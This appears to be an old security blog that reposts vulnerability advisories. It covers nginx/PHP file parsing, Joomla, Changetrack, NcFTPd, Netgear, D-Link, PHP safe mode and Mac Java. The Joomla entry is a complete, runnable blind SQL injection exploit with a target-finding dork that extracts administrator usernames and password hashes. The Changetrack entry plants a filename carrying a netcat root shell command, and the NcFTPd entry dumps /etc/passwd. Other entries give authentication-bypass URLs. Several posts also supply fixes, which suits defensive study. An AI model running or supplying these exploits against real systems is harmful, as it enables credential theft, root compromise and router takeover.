May 26

nginx php file parse vulnerability

By jason Application Security No Comments »

nginx [engine x] is a HTTP and reverse proxy server, as well as a mail proxy server written by Igor Sysoev. It has been running for more than five years on many heavily loaded Russian sites including. The vulnerability will let error file type as php file. It’s a very critical bug.

Generally, nginx will parse php file by cgi. Example:

location ~ \.php$ {
root html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
include fastcgi_params;
}

In location part,nginx will proceed request by URI variable, and the SCRIPT_FILENAME’s value will be defined by $fastcgi_script_name, the $fastcgi_script_name variable default is open by cgi.fix_pathinfo option  in php.ini file.

Assume, have a the url http://www.goitowrld.com/nginx.jpg, you can try to visit fllow url.

http://www.goitworld.com/nginx.jpg/nginx.php

will have a URI /nginx.jpg/nginx.php

By location command,the request will submit to fastcgi proceed,the SCRIPT_FILENAME variable will set to /script/nginx.jpg/nginx.php

while cgi.fix_pathinfo parameter have been set to 1, now it will split SCRIPT_FILENAME and PATH_INFO to

/script/nginx.jpg and nginx.php

Final the nginx.jpg will be parsed as php file.

Brose url http://www.goitowrld.com/nginx.jpg respone

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:05:30 GMT
Content-Type: image/jpeg
Content-Length: 18
Last-Modified: Thu, 20 May 2010 06:26:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

Brose url http://www.goitowrld.com/nginx.jpg/nginx.php respone

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:06:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.6

Solution:

1.modify php.ini file and set parameter

cgi.fix_pathinfo=0

2.modify nginx config file

if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}

Tagged with:
Feb 26

Joomla Component com_joomlaconnect_be Blind Injection Vulnerability

By jason Security Tools No Comments »

Test Code


#!/usr/bin/php
  <?php 

ini_set("max_execution_time",0); 

print_r(' 

########################################################################### 

[»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability 

########################################################################### 

[»] Script:   [Joomla] 

[»] Language: [ PHP ] 

[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] 

[»] Greetz to:[ Spécial >>>>His0k4 >>>>   Tous les hackers Algérie 

[»] Dork: inurl:index.php?option=com_joomlaconnect_be 

########################################################################### 

########################################################################### 

# 

#  Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit 

#  [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3 

# 

# 

########################################################################### 

'); 

if ($argc > 1) { 

$url = $argv[1]; 

$r = strlen(file_get_contents($url."+and+1=1--")); 

echo "\nExploiting:\n"; 

$w = strlen(file_get_contents($url."+and+1=0--")); 

$t = abs((100-($w/$r*100))); 

echo "Username: "; 

for ($i=1; $i <= 30; $i++) { 

$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); 

   if (abs((100-($laenge/$r*100))) > $t-1) { 

      $count = $i; 

      $i = 30; 

   } 

} 

for ($j = 1; $j < $count; $j++) { 

   for ($i = 46; $i <= 122; $i=$i+2) { 

      if ($i == 60) { 

         $i = 98; 

      } 

      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); 

      if (abs((100-($laenge/$r*100))) > $t-1) { 

         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); 

         if (abs((100-($laenge/$r*100))) > $t-1) { 

            echo chr($i-1); 

         } else { 

            echo chr($i); 

         } 

         $i = 122; 

      } 

   } 

} 

echo "\nPassword: "; 

for ($j = 1; $j <= 49; $j++) { 

   for ($i = 46; $i <= 102; $i=$i+2) { 

      if ($i == 60) { 

         $i = 98; 

      } 

      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); 

      if (abs((100-($laenge/$r*100))) > $t-1) { 

         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); 

         if (abs((100-($laenge/$r*100))) > $t-1) { 

            echo chr($i-1); 

         } else { 

            echo chr($i); 

         } 

         $i = 102; 

      } 

   } 

} 

} 

?>
Tagged with:
Oct 03

Changetrack 4.3-3 Local Privilege Escalation Vulnerability

By jason Security Tools No Comments »

TITLE:
Changetrack Privilege Escalation Vulnerability

SECUNIA ADVISORY ID:
SA36756

VERIFY ADVISORY:
http://secunia.com/advisories/36756/

DESCRIPTION:
A vulnerability has been discovered in Changetrack, which can be
exploited by malicious, local users to gain escalated privileges.

The application does not properly escape certain file names, which
can be exploited to inject and execute arbitrary shell commands
(potentially with "root" privileges) by creating a maliciously named
file in a directory tracked by Changetrack.

Successful exploitation requires write privileges to a directory
scanned by Changetrack.

SOLUTION:
Use Changetrack to track trusted directories only.

PROVIDED AND/OR DISCOVERED BY:
Marek Grzybowski

——————————————————————————–
Example of exploitation:

———— Attacker ———-

rick@testmachine:~/testt$ touch "<\`nc -l -p 5001 -e \$SHELL\`"
rick@testmachine:~/testt$ ls
<`nc -l -p 5001 -e $SHELL`

——————————–

———— root ————–

testmachine:~# changetrack

———— root ————–

———— Attacker ———-

rick@testmachine:~/testt$ nc 127.0.0.1 5001
id
uid=0(root) gid=0(root) groups=0(root)

——————————–

Tagged with:
Aug 12

Please immediately upgrade your wordpress to 2.8.4

By jason IT News World 5 Comments »

A vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

We fixed this problem last night and have been testing the fixes and looking for other problems since then. Version 2.8.4 which fixes all known problems is now available for download and is highly recommended for all users of WordPress.

Tagged with:
Jul 31

NcFTPd <= 2.8.5 Remote Jail Breakout Vulnerability

By jason Application Security 1 Comment »

Discovered by:
    Kingcope
    Contact: kcope2<at>googlemail.com / http://isowarez.de

Date:
    27th July 2009

Greetings:
    Alex,Andi,Adize,wY!,Netspy,Revoguard

Prerequisites:
    Valid user account.
Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):

# ftp 192.168.2.5
Connected to 192.168.2.5.
220 localhost NcFTPd Server (unregistered copy) ready.
Name (192.168.2.5:root): kcope
331 User kcope okay, need password.
Password:
230-You are user #1 of 50 simultaneous users allowed.
230-
230 Restricted user logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get /etc/passwd passwd
local: passwd remote: /etc/passwd
502 Unimplemented command.
227 Entering Passive Mode (192,168,2,5,219,171)
550 No such file.
ftp> ls ..
227 Entering Passive Mode (192,168,2,5,218,102)
553 Permission denied.
ftp> mkdir isowarez
257 "/isowarez" directory created.
ftp> quote site symlink /etc/passwd isowarez/.message
250 Symlinked.
ftp> cd isowarez
250-"/isowarez" is new cwd.
250-
250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
250-#
250-root:*:0:0:Charlie &:/root:/bin/sh
250-toor:*:0:0:Bourne-again Superuser:/root:
250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
250-operator:*:2:5:System &:/:/usr/sbin/nologin
250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
250-smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
250-uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
250-test:*:1003:1003:test:/home/test:/bin/sh
250-+testx:*:::::/bin/sh
250
ftp>

+on freebsd you can symlink directories like ´/´

Cheerio,

Kingcope

Tagged with:
Jun 16

Netgear DG632 Router Authentication Bypass Vulnerability

By jason Security Bulletin No Comments »

Product Name: Netgear DG632 Router
Vendor: http://www.netgear.com
Date: 15 June, 2009
Author: tom@tomneaves.co.uk < tom@tomneaves.co.uk >
Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Authentication_Bypass.txt
Discovered: 18 November, 2006
Disclosed: 15 June, 2009

I. DESCRIPTION

The Netgear DG632 router has a web interface which runs on port 80.
This allows an admin to login and administer the device’s settings.
Authentication of this web interface is handled by a script called
"webcm" residing in "/cgi-bin/" which redirects to the relevant pages
depending on successful user authentication. Vulnerabilities in this
interface enable an attacker to access files and data without
authentication.

II. DETAILS

The "webcm" script handles user authentication and attempts to load
"indextop.htm" (via javascript below).  The "indextop.htm" page requires
authentication (HTTP Basic Authorization).

<script language="javascript" type="text/javascript">
function loadnext() {
//document.forms[0].target.value="top";
document.forms[0].submit();
//top.location.href="../cgi-bin/webcm?nextpage=../html/indextop.htm";
}</script></head>
<body bgcolor="#ffffff" onload="loadnext()" >

Loading file …
<form method="POST" action="../cgi-bin/webcm" id="uiPostForm">
<input type="hidden" name="nextpage" value="../html/indextop.htm" id="uiGetNext">
</form>

If a valid password to the default "admin" user is supplied, the script
then continues to load the "indextop.htm" page and continues to load the
other frames based on a hidden field.  If user authentication is
unsuccessful, the user is returned back to "../cgi-bin/webcm".  It is
possible to bypass the "webcm" script and access specific files directly
without the need for authentication.

Normal use:
http://TARGET_IP/cgi-bin/webcm?nextpage=../html/stattbl.htm

This would ask for the user to authenticate and would refuse access to
this file if authentication details were not known.  All the script is
doing is making sure authentication is forced upon the user.  The same
"stattbl.htm" file can be accessed without having to provide any
authentication using the following URL:

http://TARGET_IP/html/stattbl.htm

Another example:
http://192.168.0.1/cgi-bin/webcm?nextpage=../html/modemmenu.htm
(returns 401 – Forbidden)

Bypassing the "webcm" script:
http://192.168.0.1/html/modemmenu.htm
(returns 200 – OK)

In the example above (modemmenu.htm), the full source can be viewed
which discloses further directories and files within the javascript of
the page. A sample of files disclosed within modemmenu.htm and available
to download are:

/html/onload.htm
/html/form.css
/gateway/commands/saveconfig.html
/html/utility.js (full source)

There are many other files that are accessible by calling them directly
instead of going via the "webcm" script, the above are just a sample. In
addition, it is possible to specify paths to the "webcm" script as shown
below:

http://TARGET_IP/cgi-bin/webcm?nextpage=../../

This allows an attacker to enumerate what files and directories exist
within the www root directory and beyond by using 200, 403 and 404
errors as a guide.

Affected Versions: Firmware V3.4.0_ap (others unknown)

III. VENDOR RESPONSE

12 June, 2009 – Contacted vendor.
15 June, 2009 – Vendor responded.  Stated the DG632 is an end of life
product and is no longer supported in a production and development
sense, as such, there will be no further firmware releases to resolve
this issue.

IV. CREDIT

Discovered by Tom Neaves

Tagged with:
May 26

PHP <= 5.2.9 Local Safemod Bypass Exploit

By jason Security Bulletin 1 Comment »

Title  : PHP <= 5.2.9 SafeMod Bypass Vulnerability (win32)
Affected Version : Tested on 5.2.8, 5.2.6 but previous versions maybe be afftect
Vendor  Site   : www.php.net

Vulnerability Discoverd by   : www.abysssec.com

Description :

Here is another safemod bypass vulnerability exist in php <= 5.2.9 on windows .
the problem comes from OS behavior – implement  and interfacing between php
and operation systems directory structure . the problem is php won’t tell difference
between directory browsing in linux and windows this can lead attacker to ability
execute his / her commands on targert machie even in SafeMod On  (php.ini setting) .

Vulnerability :

in linux when you want open a directory for example php directory you need
to go to /usr/bin/php and you can’t use \usr\bin\php . but windows won’t tell
diffence between slash and back slash it means there is no didffrence  between
c:\php and c:/php , and this is not vulnerability but itself but  because of this  simple
php implement "\" character can escape safemode using  function like excec .

PoC / Exploit :

orginal : www.abysssec.com/safemod-windows.zip
mirror  : www.milw0rm.com/sploits/2009-safemod-windows.zip

note : this vulnerabities is just for educational purpose and showing vulnerability exist
so author will be not be responsible for any damage using this vulnerabilty.

for more information visit Abysssec.com
feel free to contact me at admin [at] abysssec.com

Tagged with:
May 20

Critical Mac OS X Java Vulnerabilities

By jason Security Bulletin No Comments »

Introduction

Five months ago, CVE-2008-5353 and other vulnerabilities were publicly
disclosed, and fixed by Sun.

CVE-2008-5353 allows malicious code to escape the Java sandbox and run
arbitrary commands with the permissions of the executing user. This may
result in untrusted Java applets executing arbitrary code  merely by
visiting a web page hosting the applet. The issue is trivially
exploitable.

Unfortunately, these vulnerabilities remain in Apple’s shipping JVMs, as
well as Soylatte 1.0.3. As Soylatte does not provide browser plugins,
the impact of the vulnerability is reduced. The recent release of
OpenJDK6/Mac OS X is not affected by CVE-2008-5353.

Work-Arounds

    * Mac OS X users should disable Java applets in their browsers and
      disable ‘Open "safe" files after downloading’ in Safari.
    * Soylatte users running untrusted code should upgrade to an
      OpenJDK6-based release, where possible. No future releases of the
      JRL-based Soylatte branch are planned at this time. If this is an
      issue for you, please feel free to contact me.
    * No work-around is available for users otherwise running Java
      untrusted code.

Proof of Concept

Unfortunately, it seems that many Mac OS X security issues are ignored
if the severity of the issue is not adequately demonstrated. Due to the
fact that an exploit for this issue is available in the wild, and the
vulnerability has been public knowledge for six months, I have decided
to release a my own proof of concept to demonstrate the issue.

If you visit the following page, "/usr/bin/say" will be executed on your
system by a Java applet, with your current user permissions. This link
will execute code on your system with your current user permissions. The
proof of concept runs on fully-patched PowerPC and Intel Mac OS X
systems.

http://landonf.bikemonkey.org/static/moab-tests/CVE-2008-5353/hello.html

compiled/decompiled: http://milw0rm.com/sploits/2009-javax.tgz

Tagged with:
May 17

D-Link Captcha Bypass

By jason Security Bulletin No Comments »

D-Link released new firmware designed to protect against malware that
alters DNS settings by logging in to the router using default administrative
credentials. There is a flaw in the captcha authentication system that allows
an attacker to glean your WiFi WPA pass phrase from the router with only user-level
access, and without properly solving the captcha.

When you login with the captcha enabled, the request looks like this:

GET /post_login.xmlhash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a&auth_code=0C52
F&auth_id=268D2

The hash is a salted MD5 hash of your password, the auth_code is the captcha value that
you entered, and the auth_id is unique to the captcha image that you viewed
(this presumably allows the router to check the auth_code against the proper captcha image).
The problem is that if you leave off the auth_code and auth_id values, some pages in the
D-Link Web interface think that you’ve properly authenticated, as long as you get
the hash right:

    GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a

Most notably, once you’ve made the request to post_login.xml, you can activate WPS with the following request:

    GET /wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0

When WPS is activated, anyone within WiFi range can claim to be a valid WPS client and
retrieve the WPA passphrase directly from the router.

More info on WPS et al. at http://www.sourcesec.com/2009/05/12/d-link-captcha-partially-broken/

Tagged with:
preload preload preload